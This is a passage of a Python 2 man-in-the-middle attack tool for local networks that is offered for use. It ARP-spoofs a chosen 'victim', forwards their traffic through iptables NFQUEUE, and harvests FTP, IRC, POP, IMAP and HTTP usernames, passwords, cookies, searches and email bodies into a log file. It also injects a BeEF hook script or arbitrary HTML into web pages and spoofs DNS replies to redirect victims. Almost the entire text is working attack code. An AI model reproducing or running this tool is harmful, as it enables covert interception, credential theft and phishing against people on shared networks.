[y/n]: ') if nfq == 'y': os.system('apt-get install -y python-nfqueue') else: exit('[-] Exiting due to missing dependency') import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * conf.verb=0 #Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server conf.checkIPaddr=0 from sys import exit from threading import Thread import argparse from os import geteuid, devnull import signal from base64 import b64decode from subprocess import * from twisted.internet import reactor from twisted.internet.interfaces import IReadDescriptor from twisted.internet.protocol import Protocol, Factory from zlib import decompressobj, decompress import gzip from cStringIO import StringIO import requests def parse_args(): #Create the arguments parser = argparse.ArgumentParser() parser.add_argument("-b", "--beef", help="Inject a BeEF hook URL. Example usage: -b http://192.168.0.3:3000/hook.js") parser.add_argument("-c", "--code", help="Inject arbitrary html. Example usage (include quotes): -c '<title>New title</title>'") parser.add_argument("-u", "--urlspy", help="Show all URLs and search terms the victim visits or enters minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -v to print all URLs and without truncation.", action="store_true") parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning which would give you a list of possible targets. Usage: -ip <victim IP>") parser.add_argument("-vmac", "--victimmac", help="Set the victim MAC; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary") parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true") parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does.", action="store_true") parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument. An argument like [facebook.com] will match all subdomains of facebook.com") parser.add_argument("-set", "--setoolkit", help="Start Social Engineer's Toolkit in another window.", action="store_true") parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP username/password combos for you.", action="store_true") parser.add_argument("-na", "--nmapaggressive", help="Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP.", action="store_true") parser.add_argument("-n", "--nmap", help="Scan the target for open ports prior to starting to sniffing their packets.", action="store_true") parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`.") parser.add_argument("-r", "--redirectto", help="Must be used with -dns DOMAIN option. Redirects the victim to the IP in this argument when they visit the domain in the -dns DOMAIN option") parser.add_argument("-rip", "--routerip", help="Set the router IP; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary") parser.add_argument("-rmac", "--routermac", help="Set the router MAC; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary") parser.add_argument("-pcap", "--pcap", help="Parse through a pcap file") return parser.parse_args() #Console colors W = '\033[0m' # white (normal) R = '\033[31m' # red G = '\033[32m' # green O = '\033[33m' # orange B = '\033[34m' # blue P = '\033[35m' # purple C = '\033[36m' # cyan GR = '\033[37m' # gray T = '\033[93m' # tan logger = open('LANspy.log.txt', 'w+') DN = open(devnull, 'w') class Spoof(): def originalMAC(self, ip): # srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3) for s,r in ans: return r.sprintf("%Ether.src%") def poison(self, routerIP, victimIP, routerMAC, victimMAC): send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC)) send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC)) def restore(self, routerIP, victimIP, routerMAC, victimMAC): send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3) send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3) class Parser(): # Mail, irc, post parsing OheadersFound = [] IheadersFound = [] IMAPauth = 0 IMAPdest = '' POPauth = 0 POPdest = '' Cookies = [] IRCnick = '' mail_passwds = [] oldmailack = '' oldmailload = '' mailfragged = 0 # http parsing oldHTTPack = '' oldHTTPload = '' HTTPfragged = 0 # html injection block_acks = [] html_url = '' user_agent = None def __init__(self, args): self.args = args def start(self, payload): if self.args.pcap: if self.args.ipaddress: try: pkt = payload[iP] except Exception: return else: try: pkt = IP(payload.get_data()) except Exception: return IP_layer = pkt[iP] IP_dst = pkt[iP].dst IP_src = pkt[iP].src if self.args.urlspy or self.args.post or self.args.beef or self.args.code: if pkt.haslayer(Raw): if pkt.haslayer(TCP): dport = pkt[TCP].dport sport = pkt[TCP].sport ack = pkt[TCP].ack seq = pkt[TCP].seq load = pkt[Raw].load mail_ports = [25, 26, 110, 143] if dport in mail_ports or sport in mail_ports: self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack) if dport == 6667 or sport == 6667: self.irc(load, dport, sport, IP_src) if dport == 21 or sport == 21: self.ftp(load, IP_dst, IP_src) if dport == 80 or sport == 80: self.http_parser(load, ack, dport) if self.args.beef or self.args.code: self.injecthtml(load, ack, pkt, payload, dport, sport) if self.args.dnsspoof: if pkt.haslayer(DNSQR): dport = pkt[uDP].dport sport = pkt[uDP].sport if dport == 53 or sport == 53: dns_layer = pkt[DNS] self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, payload) def get_user_agent(self, header_lines): for h in header_lines: user_agentre = re.search('[uu]ser-[Aa]gent: ', h) if user_agentre: return h.split(user_agentre.group(), 1)[1] def injecthtml(self, load, ack, pkt, payload, dport, sport): for x in self.block_acks: if ack == x: payload.set_verdict(nfqueue.NF_DROP) return ack = str(ack) if self.args.beef: bhtml = '<script src='+self.args.beef+'></script>' if self.args.code: chtml = self.args.code try: headers, body = load.split("\r\n\r\n", 1) except Exception: headers = load body = '' header_lines = headers.split("\r\n") if dport == 80: post = None get = self.get_get(header_lines) host = self.get_host(header_lines) self.html_url = self.get_url(host, get, post) if self.html_url: d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] if any(i in self.html_url for i in d): self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return else: payload.set_verdict(nfqueue.NF_ACCEPT) return self.user_agent = "'"+self.get_user_agent(header_lines)+"'" if not self.user_agent: # Most common user-agent on the internet self.user_agent = "'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36'" payload.set_verdict(nfqueue.NF_ACCEPT) return if sport == 80 and self.html_url and 'Content-Type: text/html' in headers: # This can be done better, probably using filter() header_lines = [x for x in header_lines if 'transfer-encoding' not in x.lower()] for h in header_lines: if '1.1 302' in h or '1.1 301' in h: # Allow redirects to go thru unperturbed payload.set_verdict(nfqueue.NF_ACCEPT) self.html_url = None return UA_header = {'User-Agent':self.user_agent} r = requests.get('http://'+self.html_url, headers=UA_header) try: body = r.text.encode('utf-8') except Exception: payload.set_verdict(nfqueue.NF_ACCEPT) debugger = open('/home/user/projects/origBody', 'w') debugger.write(body) debugger.close() # INJECT if self.args.beef: if '<html' in body or '/html>' in body: try: psplit = body.split('</head>', 1) body = psplit[0]+bhtml+'</head>'+psplit[1] except Exception: try: psplit = body.split('<head>', 1) body = psplit[0]+'<head>'+bhtml+psplit[1] except Exception: if not self.args.code: self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return else: pass if self.args.code: if '<html' in body or '/html>' in body: try: psplit = body.split('<head>', 1) body = psplit[0]+'<head>'+chtml+psplit[1] except Exception: try: psplit = body.split('</head>', 1) body = psplit[0]+chtml+'</head>'+psplit[1] except Exception: self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return # Recompress data if necessary if 'Content-Encoding: gzip' in headers: if body != '': # debugger = open('/home/user/projects/injectedBody', 'w') # debugger.write(body) # debugger.close() try: comp_body = StringIO() f = gzip.GzipFile(fileobj=comp_body, mode='w', compresslevel = 9) f.write(body) f.close() body = comp_body.getvalue() except Exception: try: pkt[Raw].load = headers+"\r\n\r\n"+body pkt[iP].len = len(str(pkt)) del pkt[iP].chksum del pkt[TCP].chksum payload.set_verdict(nfqueue.NF_DROP) send(pkt) print '[-] Could not recompress html, sent packet as is' self.html_url = None return except Exception: self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return headers = "\r\n".join(header_lines) pkt[Raw].load = headers+"\r\n\r\n"+body pkt[iP].len = len(str(pkt)) del pkt[iP].chksum del pkt[TCP].chksum try: send(pkt) print R+'[!] Injected HTML into packet for '+W+self.html_url logger.write('[!] Injected HTML into packet for '+self.html_url) self.block_acks.append(ack) payload.set_verdict(nfqueue.NF_DROP) self.html_url = None except Exception: payload.set_verdict(nfqueue.NF_ACCEPT) self.html_url = None print '[-] Failed to inject packet' return if len(self.block_acks) > 30: self.block_acks = self.block_acks[5:] def get_host(self, header_lines): for l in header_lines: searchHost = re.search('[Hh]ost: ', l) if searchHost: try: return l.split('Host: ', 1)[1] except Exception: try: return l.split('host: ', 1)[1] except Exception: return def get_get(self, header_lines): for l in header_lines: searchGet = re.search('GET /', l) if searchGet: try: return l.split('GET ')[1].split(' ')[0] except Exception: return def get_post(self, header_lines): for l in header_lines: searchPost = re.search('POST /', l) if searchPost: try: return l.split(' ')[1].split(' ')[0] except Exception: return def get_url(self, host, get, post): if host: if post: return host+post if get: return host+get # Catch search terms # As it stands now this has a moderately high false positive rate mostly due to the common ?s= and ?q= vars # I figured better to err on the site of more data than less and it's easy to tell the false positives from the real searches def searches(self, url, host): # search, query, search?q, ?s, &q, ?q, search?p, searchTerm, keywords, command searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|search[Tt]erm|keywords|command)=([^&][^&]*))', url) if searched: searched = searched.group(3) # Common false positives if 'select%20*%20from' in searched: pass if host == 'geo.yahoo.com': pass else: searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$') print T+'[+] Searched '+W+host+T+': '+searched+W logger.write('[+] Searched '+host+ ' for: '+searched+'\n') def post_parser(self, url, body, host, header_lines): if 'ocsp' in url: print B+'[+] POST: '+W+url logger.write('[+] POST: '+url+'\n') elif body != '': try: urlsplit = url.split('/') url = urlsplit[0]+'/'+urlsplit[1] except Exception: pass if self.HTTPfragged == 1: print B+'[+] Fragmented POST: '+W+url+B+" HTTP POST's combined load: "+body+W logger.write('[+] Fragmented POST: '+url+" HTTP POST's combined load: "+body+'\n') else: print B+'[+] POST: '+W+url+B+' HTTP POST load: '+body+W logger.write('[+] POST: '+url+" HTTP POST's combined load: "+body+'\n') # If you see any other login/pw variable names, tell me and I'll add em in here # As it stands now this has a moderately high false positive rate; I figured better to err on the site of more data than less # email, user, username, name, login, log, loginID user_regex = '([Ee]mail|[uu]ser|[uu]sername|[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[ii][Dd])=([^&|;]*)' # password, pass, passwd, pwd, psw, passwrd, passw pw_regex = '([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][ss][Ww]|[Pp]asswrd|[Pp]assw)=([^&|;]*)' username = re.findall(user_regex, body) password = re.findall(pw_regex, body) self.user_pass(username, password) self.cookies(host, header_lines) def http_parser(self, load, ack, dport): load = repr(load)[1:-1] # Catch fragmented HTTP posts if dport == 80 and load != '': if ack == self.oldHTTPack: self.oldHTTPload = self.oldHTTPload+load load = self.oldHTTPload self.HTTPfragged = 1 else: self.oldHTTPload = load self.oldHTTPack = ack self.HTTPfragged = 0 try: headers, body = load.split(r"\r\n\r\n", 1) except Exception: headers = load body = '' header_lines = headers.split(r"\r\n") host = self.get_host(header_lines) get = self.get_get(header_lines) post = self.get_post(header_lines) url = self.get_url(host, get, post) # print urls if url: #Print the URL if self.args.verboseURL: print '[*] '+url logger.write('[*] '+url+'\n') if self.args.urlspy: d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] if any(i in url for i in d): return if len(url) > 146: print '[*] '+url[:145] logger.write('[*] '+url[:145]+'\n') else: print '[*] '+url logger.write('[*] '+url+'\n') # Print search terms self.searches(url, host) #Print POST load and find cookies if self.args.post and post: self.post_parser(url, body, host, header_lines) def ftp(self, load, IP_dst, IP_src): load = repr(load)[1:-1].replace(r"\r\n", "") if 'USER ' in load: print R+'[!] FTP '+load+' SERVER: '+IP_dst+W logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n') if 'PASS ' in load: print R+'[!] FTP '+load+' SERVER: '+IP_dst+W logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n') if 'authentication failed' in load: print R+'[*] FTP '+load+W logger.write('[*] FTP '+load+'\n') def irc(self, load, dport, sport, IP_src): load = repr(load)[1:-1].split(r"\r\n") if self.args.post: if IP_src == victimIP: if 'NICK ' in load[0]: self.IRCnick = load[0].split('NICK ')[1] server = load[1].replace('USER user user ', '').replace(' :user', '') print R+'[!] IRC username: '+self.IRCnick+' on '+server+W logger.write('[!] IRC username: '+self.IRCnick+' on '+server+'\n') if 'NS IDENTIFY ' in load[0]: ircpass = load[0].split('NS IDENTIFY ')[1] print R+'[!] IRC password: '+ircpass+W logger.write('[!] IRC password: '+ircpass+'\n') if 'JOIN ' in load[0]: join = load[0].split('JOIN ')[1] print C+'[+] IRC joined: '+W+join logger.write('[+] IRC joined: '+join+'\n') if 'PART ' in load[0]: part = load[0].split('PART ')[1] print C+'[+] IRC left: '+W+part logger.write('[+] IRC left: '+part+'\n') if 'QUIT ' in load[0]: quit = load[0].split('QUIT :')[1] print C+'[+] IRC quit: '+W+quit logger.write('[+] IRC quit: '+quit+'\n') # Catch messages from the victim to an IRC channel if 'PRIVMSG ' in load[0]: if IP_src == victimIP: load = load[0].split('PRIVMSG ')[1] channel = load.split(' :', 1)[0] ircmsg = load.split(' :', 1)[1] if self.IRCnick != '': print C+'[+] IRC victim '+W+self.IRCnick+C+' to '+W+channel+C+': '+ircmsg+W logger.write('[+] IRC '+self.IRCnick+' to '+channel+': '+ircmsg+'\n') else: print C+'[+] IRC msg to '+W+channel+C+': '+ircmsg+W logger.write('[+] IRC msg to '+channel+':'+ircmsg+'\n') # Catch messages from others that tag the victim's nick elif self.IRCnick in load[0] and self.IRCnick != '': sender_nick = load[0].split(':', 1)[1].split('!', 1)[0] try: load = load[0].split('PRIVMSG ')[1].split(' :', 1) channel = load[0] ircmsg = load[1] print C+'[+] IRC '+W+sender_nick+C+' to '+W+channel+C+': '+ircmsg[1:]+W logger.write('[+] IRC '+sender_nick+' to '+channel+': '+ircmsg[1:]+'\n') except Exception: return def cookies(self, host, header_lines): for x in header_lines: if 'Cookie:' in x: if x in self.Cookies: return elif 'safebrowsing.clients.google.com' in host: return else: self.Cookies.append(x) print P+'[+] Cookie found for '+W+host+P+' logged in LANspy.log.txt'+W logger.write('[+] Cookie found for'+host+':'+x.replace('Cookie: ', '')+'\n') def user_pass(self, username, password): if username: for u in username: print R+'[!] Username found: '+u[1]+W logger.write('[!] Username: '+u[1]+'\n') if password: for p in password: if p[1] != '': print R+'[!] Password: '+p[1]+W logger.write('[!] Password: '+p[1]+'\n') def mailspy(self, load, dport, sport, IP_dst, IP_src, mail_ports, ack): load = repr(load)[1:-1] # Catch fragmented mail packets if ack == self.oldmailack: if load != r'.\r\n': self.oldmailload = self.oldmailload+load load = self.oldmailload self.mailfragged = 1 else: self.oldmailload = load self.oldmailack = ack self.mailfragged = 0 try: headers, body = load.split(r"\r\n\r\n", 1) except Exception: headers = load body = '' header_lines = headers.split(r"\r\n") email_headers = ['Date: ', 'Subject: ', 'To: ', 'From: '] # Find passwords if dport in [25, 26, 110, 143]: self.passwords(IP_src, load, dport, IP_dst) # Find outgoing messages if dport == 26 or dport == 25: self.outgoing(load, body, header_lines, email_headers, IP_src) # Find incoming messages if sport in [110, 143]: self.incoming(headers, body, header_lines, email_headers, sport, dport) def passwords(self, IP_src, load, dport, IP_dst): load = load.replace(r'\r\n', '') if dport == 143 and IP_src == victimIP and len(load) > 15: if self.IMAPauth == 1 and self.IMAPdest == IP_dst: # Don't double output mail passwords for x in self.mail_passwds: if load in x: self.IMAPauth = 0 self.IMAPdest = '' return print R+'[!] IMAP user and pass found: '+load+W logger.write('[!] IMAP user and pass found: '+load+'\n') self.mail_passwds.append(load) self.decode(load, dport) self.IMAPauth = 0 self.IMAPdest = '' if "authenticate plain" in load: self.IMAPauth = 1 self.IMAPdest = IP_dst if dport == 110 and IP_src == victimIP: if self.POPauth == 1 and self.POPdest == IP_dst and len(load) > 10: # Don't double output mail passwords for x in self.mail_passwds: if load in x: self.POPauth = 0 self.POPdest = '' return print R+'[!] POP user and pass found: '+load+W logger.write('[!] POP user and pass found: '+load+'\n') self.mail_passwds.append(load) self.decode(load, dport) self.POPauth = 0 self.POPdest = '' if 'AUTH PLAIN' in load: self.POPauth = 1 self.POPdest = IP_dst if dport == 26: if 'AUTH PLAIN ' in load: # Don't double output mail passwords for x in self.mail_passwds: if load in x: self.POPauth = 0 self.POPdest = '' return print R+'[!] Mail authentication found: '+load+W logger.write('[!] Mail authentication found: '+load+'\n') self.mail_passwds.append(load) self.decode(load, dport) def outgoing(self, headers, body, header_lines, email_headers, IP_src): if 'Message-ID' in headers: for l in header_lines: for x in email_headers: if x in l: self.OheadersFound.append(l) # if date, from, to, in headers then print the message if len(self.OheadersFound) > 3 and body != '': if self.mailfragged == 1: print O+'[!] OUTGOING MESSAGE (fragmented)'+W logger.write('[!] OUTGOING MESSAGE (fragmented)\n') for x in self.OheadersFound: print O+' ',x+W logger.write(' '+x+'\n') print O+' Message:',body+W logger.write(' Message:'+body+'\n') else: print O+'[!] OUTGOING MESSAGE'+W logger.write('[!] OUTGOING MESSAGE\n') for x in self.OheadersFound: print O+' ',x+W logger.write(' '+x+'\n') print O+' Message:',body+W logger.write(' Message:'+body+'\n') self.OheadersFound = [] def incoming(self, headers, body, header_lines, email_headers, sport, dport): message = '' for l in header_lines: for x in email_headers: if x in l: self.IheadersFound.append(l) if len(self.IheadersFound) > 3 and body != '': if "BODY[TEXT]" not in body: try: beginning = body.split(r"\r\n", 1)[0] body1 = body.split(r"\r\n\r\n", 1)[1] message = body1.split(beginning)[0][:-8] #get rid of last \r\n\r\n except Exception: return if message != '': if self.mailfragged == 1: print O+'[!] INCOMING MESSAGE (fragmented)'+W logger.write('[!] INCOMING MESSAGE (fragmented)\n') for x in self.IheadersFound: print O+' '+x+W logger.write(' '+x+'\n') print O+' Message: '+message+W logger.write(' Message: '+message+'\n') else: print O+'[!] INCOMING MESSAGE'+W logger.write('[!] INCOMING MESSAGE\n') for x in self.IheadersFound: print O+' '+x+W logger.write(' '+x+'\n') print O+' Message: '+message+W logger.write(' Message: '+message+'\n') self.IheadersFound = [] def decode(self, load, dport): decoded = '' if dport == 25 or dport == 26: try: b64str = load.replace("AUTH PLAIN ", "").replace(r"\r\n", "") decoded = repr(b64decode(b64str))[1:-1].replace(r'\x00', ' ') except Exception: pass else: try: b64str = load decoded = repr(b64decode(b64str))[1:-1].replace(r'\x00', ' ') except Exception: pass # Test to see if decode worked if '@' in decoded: print R+'[!] Decoded:'+decoded+W logger.write('[!] Decoded:'+decoded+'\n') # Spoof DNS for a specific domain to point to your machine # Make this more reliable by blocking all DNS responses from the server using the IP_src maybe a self.dnsSrc var def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, payload): if self.args.dnsspoof: if self.args.dnsspoof in dns_layer.qd.qname and not self.args.redirectto: localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0] self.dnsspoof_actions(dns_layer, IP_src, IP_dst, sport, dport, payload, localIP) elif self.args.dnsspoof in dns_layer.qd.qname and self.args.redirectto: self.dnsspoof_actions(dns_layer, IP_src, IP_dst, sport, dport, payload, self.args.redirectto) def dnsspoof_actions(self, dns_layer, IP_src, IP_dst, sport, dport, payload, rIP): payload.set_verdict(nfqueue.NF_DROP) print G+'[+] DNS request for '+W+self.args.dnsspoof+G+' found; dropping packet and injecting spoofed one redirecting to '+W+rIP logger.write('[+] DNS request for '+self.args.dnsspoof+' found; dropping packet and injecting spoofed one redirecting to '+rIP+'\n') p = IP(dst=IP_src, src=IP_dst)/UDP(dport=sport, sport=dport)/DNS(id=dns_layer.id, qr=1, aa=1, qd=dns_layer.qd, an=DNSRR(rrname=dns_layer.qd.qname, ttl=10, rdata=rIP)) send(p) print G+'[!] Sent spoofed packet for '+W+self.args.dnsspoof+G+' to '+W+rIP logger.write('[!] Sent spoofed packet for '+self.args.dnsspoof+' to '+rIP+'\n') #Wrap the nfqueue object in an IReadDescriptor and run the process_pending function in a .doRead() of the twisted IReadDescriptor class Queued(object): def __init__(self, args): self.q = nfqueue.queue() self.q.set_callback(Parser(args).start) self.q.fast_open(0, socket.AF_INET) self.q.set_queue_maxlen(5000) reactor.addReader(self) self.q.set_mode(nfqueue.NFQNL_COPY_PACKET) print '[*] Flushed firewall and forwarded traffic to the queue; waiting for data' def fileno(self): return self.q.get_fd() def doRead(self): self.q.process_pending(20) def connectionLost(self, reason): reactor.removeReader(self) def logPrefix(self): return 'queued' class active_users(): IPandMAC = [] start_time = time.time() current_time = 0 monmode = '' def pkt_cb(self, pkt): if pkt.haslayer(Dot11): pkt = pkt[Dot11] if pkt.type == 2: addresses = [pkt.addr1.upper(), pkt.addr2.upper(), pkt.addr3.upper()] for x in addresses: for y in self.IPandMAC: if x in y[1]: y[2] = y[2]+1 self.current_time = time.time() if self.current_time > self.start_time+1: self.IPandMAC.sort(key=lambda x: float(x[2]), reverse=True) # sort by data packets os.system('/usr/bin/clear') print '[*] '+T+'IP address'+W+' and '+R+'data packets'+W+' sent/received' print '---------------------------------------------' for x in self.IPandMAC: if len(x) == 3: ip = x[0].ljust(16) data = str(x[2]).ljust(5) print T+ip+W, R+data+W else: ip = x[0].ljust(16) data = str(x[2]).ljust(5) print T+ip+W, R+data+W, x[3] print '\n[*] Hit Ctrl-C at any time to stop and choose a victim IP' self.start_time = time.time() def users(self, IPprefix, routerIP): print '[*] Running ARP ping to identify users on the network; this may take a minute...' iplist = [] maclist = [] try: nmap = Popen(['/usr/bin/nmap', '-sn', '-n', IPprefix], stdout=PIPE, stderr=DN) nmap = nmap.communicate()[0] nmap = nmap.splitlines()[2:-1] except Exception: print '[-] Nmap ARP ping failed, is nmap installed?' for x in nmap: if 'Nmap' in x: pieces = x.split() nmapip = pieces[len(pieces)-1] nmapip = nmapip.replace('(','').replace(')','') iplist.append(nmapip) if 'MAC' in x: nmapmac = x.split()[2] maclist.append(nmapmac) zipped = zip(iplist, maclist) self.IPandMAC = [list(item) for item in zipped] # Make sure router is caught in the arp ping r = 0 for i in self.IPandMAC: i.append(0) if r == 0: if routerIP == i[0]: i.append('router') routerMAC = i[1] r = 1 if r == 0: exit('[-] Router MAC not found. Exiting.') # Do nbtscan for windows netbios names print '[*] Running nbtscan to get Windows netbios names' try: nbt = Popen(['nbtscan', IPprefix], stdout=PIPE, stderr=DN) nbt = nbt.communicate()[0] nbt = nbt.splitlines() nbt = nbt[4:] except Exception: print '[-] nbtscan error, are you sure it is installed?' for l in nbt: try: l = l.split() nbtip = l[0] nbtname = l[1] except Exception: print '[-] Could not find any netbios names. Continuing without them' if nbtip and nbtname: for a in self.IPandMAC: if nbtip == a[0]: a.append(nbtname) # Start monitor mode print '[*] Enabling monitor mode [/usr/sbin/airmon-ng ' + 'start ' + interface + ']' try: promiscSearch = Popen(['/usr/sbin/airmon-ng', 'start', '%s' % interface], stdout=PIPE, stderr=DN) promisc = promiscSearch.communicate()[0] monmodeSearch = re.search('monitor mode enabled on (.+)\)', promisc) self.monmode = monmodeSearch.group(1) except Exception: exit('[-] Enabling monitor mode failed, do you have aircrack-ng installed?') sniff(iface=self.monmode, prn=self.pkt_cb, store=0) #Print all the variables def print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP): print "[*] Active interface: " + interface print "[*] DHCP server: " + DHCPsrvr print "[*] DNS server: " + dnsIP print "[*] Local domain: " + local_domain print "[*] Router IP: " + routerIP print "[*] Victim IP: " + victimIP logger.write("[*] Router IP: " + routerIP+'\n') logger.write("[*] victim IP: " + victimIP+'\n') #Enable IP forwarding and flush possibly conflicting iptables rules def setup(victimMAC): open('/proc/sys/net/ipv4/ip_forward', 'w').write('1\n') print '[*] Enabled IP forwarding' os.system('/sbin/iptables -F') os.system('/sbin/iptables -X') os.system('/sbin/iptables -t nat -F') os.system('/sbin/iptables -t nat -X') # Just throw packets that are from and to the victim into the reactor os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) # To catch DNS packets you gotta do prerouting rather than forward for some reason? os.system('/sbin/iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE') # Start threads def threads(args): rt = Thread(target=reactor.run, args=(False,)) #reactor must be started without signal handling since it's not in the main thread rt.daemon = True rt.start() if args.driftnet: dr = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/driftnet -i '+interface+' >/dev/null 2>&1',)) dr.daemon = True dr.start() if args.dnsspoof and not args.setoolkit: setoolkit = raw_input('[*] You are DNS spoofing '+args.dnsspoof+', would you like to start the Social Engineer\'s Toolkit for easy exploitation? [y/n]: ') if setoolkit == 'y': print '[*] Starting SEtoolkit. To clone '+args.dnsspoof+' hit options 1, 2, 3, 2, then enter '+args.dnsspoof try: se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',)) se.daemon = True se.start() except Exception: print '[-] Could not open SEToolkit, is it installed? Continuing as normal without it.' if args.nmapaggressive: print '[*] Starting '+R+'aggressive scan [nmap -e '+interface+' -T4 -A -v -Pn -oN '+victimIP+']'+W+' in background; results will be in a file '+victimIP+'.nmap.txt' try: n = Thread(target=os.system, args=('nmap -e '+interface+' -T4 -A -v -Pn -oN '+victimIP+'.nmap.txt '+victimIP+' >/dev/null 2>&1',)) n.daemon = True n.start() except Exception: print '[-] Aggressive Nmap scan failed, is nmap installed?' if args.setoolkit: print '[*] Starting SEtoolkit' try: se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',)) se.daemon = True se.start() except Exception: print '[-] Could not open SEToolkit, continuing without it.' def pcap_handler(args): global victimIP bad_args = [args.dnsspoof, args.beef, args.code, args.nmap, args.nmapaggressive, args.driftnet, args.interface] for x in bad_args: if x: sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]') if args.pcap: if args.ipaddress: victimIP = args.ipaddress pcap = rdpcap(args.pcap) for payload in pcap: Parser(args).start(payload) sys.exit('[-] Finished parsing pcap file') else: sys.exit('[-] Please include the following arguement when reading from a pcap file: -ip [target\'s IP address]') else: sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]') # Main loop def main(args): global victimIP, interface if args.pcap: pcap_handler(args) sys.exit('[-] Finished parsing pcap file') #Check if root if not geteuid()==0: exit("\nPlease run as root\n") #Find the gateway and interface ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN) ipr = ipr.communicate()[0] iprs = ipr.split('\n') ipr = ipr.split() if args.routerip: routerIP = args.routerip else: routerIP = ipr[2] for r in iprs: if '/' in r: IPprefix = r.split()[0] if args.interface: interface = args.interface else: interface = ipr[4] if 'eth' in interface or 'p3p' in interface: exit('[-] Wired interface found as default route, please connect wirelessly and retry or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].') if args.ipaddress: victimIP = args.ipaddress else: au = active_users() au.users(IPprefix, routerIP) print '\n[*] Turning off monitor mode' os.system('/usr/sbin/airmon-ng stop %s >/dev/null 2>&1' % au.monmode) try: victimIP = raw_input('[*] Enter the non-router IP to spoof: ') except KeyboardInterrupt: exit('\n[-] Quitting') print "[*] Checking the DHCP and DNS server addresses..." # DHCP is a pain in the ass to craft dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/ IP(src="0.0.0.0",dst="255.255.255.255")/ UDP(sport=68,dport=67)/ BOOTP(chaddr='E3:2E:F4:DD:8R:9A')/ DHCP(options=[("message-type","discover"), ("param_req_list", chr(DHCPRevOptions["router"][0]), chr(DHCPRevOptions["domain"][0]), chr(DHCPRevOptions["server_id"][0]), chr(DHCPRevOptions["name_server"][0]), ), "end"])) ans, unans = srp(dhcp, timeout=5, retry=1) if ans: for s,r in ans: DHCPopt = r[0][DHCP].options DHCPsrvr = r[0][iP].src for x in DHCPopt: if 'domain' in x: local_domain = x[1] pass else: local_domain = 'None' if 'name_server' in x: dnsIP = x[1] else: print "[-] No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP." dnsIP = routerIP DHCPsrvr = routerIP local_domain = 'None' # Print the vars print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP) if args.routermac: routerMAC = args.routermac print "[*] Router MAC: " + routerMAC logger.write("[*] Router MAC: "+routerMAC+'\n') else: try: routerMAC = Spoof().originalMAC(routerIP) print "[*] Router MAC: " + routerMAC logger.write("[*] Router MAC: "+routerMAC+'\n') except Exception: try: print "[-] 